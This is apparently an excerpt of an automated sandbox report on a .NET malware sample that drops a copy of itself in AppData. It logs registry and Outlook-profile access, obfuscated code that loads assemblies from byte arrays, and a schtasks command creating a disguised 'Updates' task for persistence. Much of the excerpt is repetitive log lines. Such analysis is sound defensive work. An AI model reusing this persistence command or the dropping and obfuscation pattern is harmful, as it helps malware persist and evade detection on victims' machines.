                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: ncryptsslp.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: gpapi.dll
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeSection loaded: dpapi.dll
                Source: C:\Users\user\Desktop\ckHregxJIq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\ckHregxJIq.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: ckHregxJIq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: ckHregxJIq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                Source: 1.2.ckHregxJIq.exe.365c208.1.raw.unpack, MainForm.cs.Net Code: _202D_206F_202D_200E_202A_206C_202A_202A_206D_200D_206C_206A_206A_202D_200D_206A_200D_200C_200E_200F_206B_206A_206B_202D_206A_206E_206C_200C_202E_200D_206B_206A_206A_206B_200F_202B_200C_202B_200E_202E_202E System.Reflection.Assembly.Load(byte[])
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.cs.Net Code: n1Icec0JHP System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A258FF pushfd ; retf 1_2_06A25955
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A51228 push eax; ret 1_2_06A51229
                Source: C:\Users\user\Desktop\ckHregxJIq.exeCode function: 1_2_06A5093A push es; ret 1_2_06A5093C
                Source: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeCode function: 15_2_06F21228 push eax; ret 15_2_06F21229
                Source: ckHregxJIq.exeStatic PE information: section name: .text entropy: 7.890717109770628
                Source: aFAsiNcQRJEVeL.exe.1.drStatic PE information: section name: .text entropy: 7.890717109770628
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, u3dyRKzJYCE1BncR3W.csHigh entropy of concatenated method names: 'hblmbnX0xl', 'GPPmlRs3ML', 'knkmq0VWeL', 'd0VmtDA3SB', 'cEkm9vVlRP', 'W9jmUFL9f1', 'ipOm0llW7B', 'j8NmnCafGf', 'E4SmJoARd9', 'gOLm32KLD7'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, TWVDqCskDMqZf5rRyj.csHigh entropy of concatenated method names: 'K0qmaKOaGv', 'bo9mVPFUPJ', 'rYtmAHu33D', 'mWcm7EYYHa', 'I4UmBWB2Kf', 'KXimh5kH7m', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, LZRMUE2Fj3XlcXb5N2.csHigh entropy of concatenated method names: 'Dispose', 'biEZrvqo41', 'iBrN9kOXMn', 'AcEJry57if', 'UOaZsyqvEa', 'IQbZzcd8xW', 'ProcessDialogKey', 'gdeN1v9Xvu', 'WRANZfCNDM', 'K3ONNQWVDq'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, mc80r04br1raHZc02R.csHigh entropy of concatenated method names: 'Keu7DG6TUn', 'RKP7aQ6MCc', 'd8K7AXQ3Gq', 'CudAsJKIGV', 'gIXAzedRce', 'l8j71JXNUI', 'rIC7Zm1WN2', 'bNH7Ne9uWX', 'Q3e7iiu7c6', 'b9I7cS0UAH'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, MkFTk1Zp1VPy5rmC0B4.csHigh entropy of concatenated method names: 'C9Rq5WLLuxVch', 'R2En7RdOu0vkobh8FHc', 'k2DrHUdvn0LcWsyt1Mi', 'r9o6IadFZHtrQjPbCAJ', 'jo2WLldcXQ7XBDgSMqB', 'owPHard4B4aFAq8PMYc'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, FQNciltNv6xTBg4mDn.csHigh entropy of concatenated method names: 'irdApV9rnu', 'LlfA2E7aH5', 'AXZAVX5BHj', 'f2sA7gX0x2', 'sEiAhHeINd', 'WcvVdt4MPl', 'wyhVOV1bOi', 'xfpVjonIDq', 'NwWVHdNKul', 'MDsVr2eRGr'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, HB1KvCqepuAVmDoRkk.csHigh entropy of concatenated method names: 'RKCaF4jIYI', 'AgFabMEEQG', 'shNaltvgui', 'CSEaqkVpGT', 'ADmaCmndjD', 'gMuayGXId7', 'tVrauBqohj', 'zhwaX0OgrF', 'Nl2aBlZHLu', 'bq5amjTGU0'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, lOo23tKDyq8RMS9L0O.csHigh entropy of concatenated method names: 'LND5lXQM6J', 'TdF5q9YAA9', 'GiQ5tVNqAh', 'ott59JufbZ', 'rXy5ULM2ai', 'zJJ5015xEF', 'YI554Je9ly', 'Ksd5ol9dwf', 'QBj5gKFpf6', 'nsZ56FuS9Z'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, cy90LWZZANC1R9g8UDH.csHigh entropy of concatenated method names: 'qevms8owrp', 'rBMmzPt90o', 'GxjS1JT9nn', 'RLqSZ6gN2V', 'VqHSNfr2G7', 'xL9SiW1feA', 'R9XSc4jwPs', 'OZySpViCyk', 'sYfSDeUZmf', 'q7AS2wHWmA'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, nV4DjUcygVBEuQl90c.csHigh entropy of concatenated method names: 'dU1Z7gAuJ8', 'GVMZhCIOf3', 'oepZfuAVmD', 'LRkZLkCsTP', 'H3sZCMt8QN', 'dilZyNv6xT', 'AgTBGUxdh4pnEtrtPu', 'nPuDUeaYRLAHjOuYgS', 'JcyZZiCZwL', 'sOKZiSEu9y'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, agAuJ8ltVMCIOf31qe.csHigh entropy of concatenated method names: 'dPA2GdZLEs', 'dRa2vAn7ao', 'Giv2E5xj6o', 'zDK2Qlu0Ly', 'L4B2dTaaL5', 'nTu2ODIU8C', 'pL02j7uvMd', 'ycY2H5GqK5', 'Rec2rwHf9f', 'gV52sGT6dq'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, QsKlaUZiwJH928fJXh0.csHigh entropy of concatenated method names: 'cBUSsZH9Ov', 'pDPSzvGHOE', 'V5kT10iu08', 'clCbGrdUUfvQpyAbtMH', 'rWjHe3dlg8dv2RmaKpv', 'LssAe7dqJoBlUpl8Phb', 'zs56Lhddks3fIXL3WWB'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, Moh2uvNIhrMD87MeqT.csHigh entropy of concatenated method names: 'A9gessma9', 'NuwFMhwtW', 'vUdbPE70d', 'qXORaTosP', 'JlpqsppOH', 'f2i8asUys', 'NuelMyMP3vo1YhE3tW', 'fGQ7q4Rf6HQm5KhGY2', 'f2pXTmbb6', 'jBVmJDpVO'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, pJJpnbhNcqddPKB5Gi.csHigh entropy of concatenated method names: 'xWripiBnyN', 'AwXiD1U5eW', 'sgxi2tGMry', 'UIciaqCmBq', 'VwfiVKNfHR', 'ORgiA7l7cG', 'imYi7GMxha', 'MtHihjarXP', 'vnyiPbd5ye', 'cGOifuYyps'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, zv9XvurHRAfCNDMw3O.csHigh entropy of concatenated method names: 'oqZBtwYVKB', 'sQUB9e50Jw', 'fxBBxyrbtB', 'DWLBUqcGb5', 'kBsB0Kj9Zc', 'POSBw5SZBO', 'pweB4Blh4C', 'CgbBoHiv3q', 'UWyBI2BeGp', 'UCWBgeJRqe'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, WQ8e1ROmWKFr3U75t8.csHigh entropy of concatenated method names: 'uJauH0C2h8', 'TsWusgEtD9', 'DI7X1KGJMX', 'esbXZIsrtY', 'vUCu6JWBD7', 'PGvukKySCG', 'QoruKgc0FE', 'KSyuGg7FuK', 'fTLuvuUQQ7', 'PPZuEHgkaa'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, tA0wcJIu0fB0vDCBxQ.csHigh entropy of concatenated method names: 'ORl7JTgW9j', 'xHU73OKyhx', 'UQK7erdc6t', 'mF77Fp8c6D', 'hoa7YLEDlO', 'H6a7ba09XU', 'jkJ7RbvNBG', 'Ggb7l57kCm', 'c1H7qDVECo', 'ttl78GkciO'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, cxeQw3G2l0Hu03P5VQ.csHigh entropy of concatenated method names: 'sHlCgPZ8NY', 'lsBCkIVwcW', 'KWXCGf1M8A', 'rT6Cv4nunY', 'hFVC96rTiF', 'BHgCxaRPq8', 'rxnCUPF4Dq', 'vNYC03t7Qg', 'qvlCw7aJA9', 'UYiC4YVYo8'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, R5769LjfVZiEvqo41d.csHigh entropy of concatenated method names: 'wO5BCG6PJ5', 'pjDBuRonN3', 'tBqBBS5K53', 'R3vBSZfKi7', 'uVPBWMrrs4', 'xBiBnJ5Vri', 'Dispose', 'Vg1XDjQX3D', 'G3TX2RG9Sj', 'z44XafrPIq'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, k2poIMQ64WqeCK4xGt.csHigh entropy of concatenated method names: 'tNAufaZk4o', 'g7guLw3Qty', 'ToString', 's2HuDvEYWi', 'gwfu2BiFOS', 'xvvuaZSRaw', 'WFfuVnnTm1', 'CwKuACAQV8', 'Kpru7STNI4', 'J68uhVgBbS'
                Source: 1.2.ckHregxJIq.exe.7880000.7.raw.unpack, Oa6Ics9ceFiUpsBSSN.csHigh entropy of concatenated method names: 'KerRTmUwmc3bL2JVrKS', 'tYGss4USNJUSWT6TH8j', 'NIqAXFHryD', 'mZrABM9tj2', 'f4ZAmF0LlA', 'LbHwQVUnW1ECiJo9NBA', 'rInNFPUhhog0fcQKZ7l'
                Source: C:\Users\user\Desktop\ckHregxJIq.exeFile created: C:\Users\user\AppData\Roaming\aFAsiNcQRJEVeL.exeJump to dropped file

                Boot Survival

                barindex
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\aFAsiNcQRJEVeL" /XML "C:\Users\user\AppData\Local\Temp\tmpD0A2.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\ckHregxJIq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
